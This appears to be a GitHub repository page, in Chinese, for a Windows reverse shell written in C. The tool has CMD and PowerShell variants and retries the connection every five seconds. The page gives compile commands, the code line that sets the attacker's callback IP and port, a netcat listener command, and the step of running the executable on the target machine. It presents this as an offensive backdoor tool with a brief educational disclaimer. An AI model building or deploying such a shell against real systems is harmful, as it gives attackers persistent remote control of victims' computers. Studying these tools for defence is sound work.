neutralwarrior/C-Windows-reverse-shell

GitHub: neutralwarrior/C-Windows-reverse-shell

一个用 C 语言编写的 Windows 反向 Shell,提供 CMD 和 PowerShell 两个版本,内置持久化重连机制。

Stars: 5 | Forks: 0

# Windows 反向 Shell(C 语言实现) 一个用 C 语言编写的 Windows 反向 Shell,可回连至监听器并等待指令。 提供 CMD 和 PowerShell 两个版本,包含持久连接重试逻辑。 ## 版本 - **Reverse-cmd-shell.c** — 使用 `_popen()` 生成 CMD shell 的概念验证版本 - **Reverse-powershell-shell.c** — 升级版本,使用 `CreateProcess()` 并通过正确的管道重定向生成 PowerShell shell,同时捕获 stdout 和 stderr ## 使用方法 通过 MinGW 使用 GCC 编译: ``` gcc Reverse-cmd-shell.c -o Reverse-cmd-shell -lws2_32 gcc Reverse-powershell-shell.c -o Reverse-powershell-shell -lws2_32 ``` 编译前,请在源文件中设置您的 IP 和端口: ``` routeinfo.sin_addr.s_addr = inet_addr("YOUR_IP_HERE"); routeinfo.sin_port = htons(YOUR_PORT_HERE); ``` 在您的机器上启动一个监听器: ``` nc -lvnp YOUR_PORT_HERE ``` 然后在目标 Windows 机器上运行编译后的可执行文件。 ## 功能特性 - 每隔 5 秒持续重试连接,直到监听器可用 - 支持相应 Shell 接受的任何命令 - 同时捕获 stdout 和 stderr(PowerShell 版本) ## 免责声明 仅供教育目的。请仅在您拥有或已获授权测试的系统上使用。 ## 许可证 MIT
标签:Cmd, GCC, Gophish, IPv6, IP 地址批量处理, MinGW, OpenCanary, PowerShell, Socket编程, 反向Shell, 反弹连接, 后门, 客户端加密, 恶意代码, 数据展示, 标准流重定向, 渗透工具, 端点可见性, 红队, 网络安全, 自动化连接, 远程控制, 隐私保护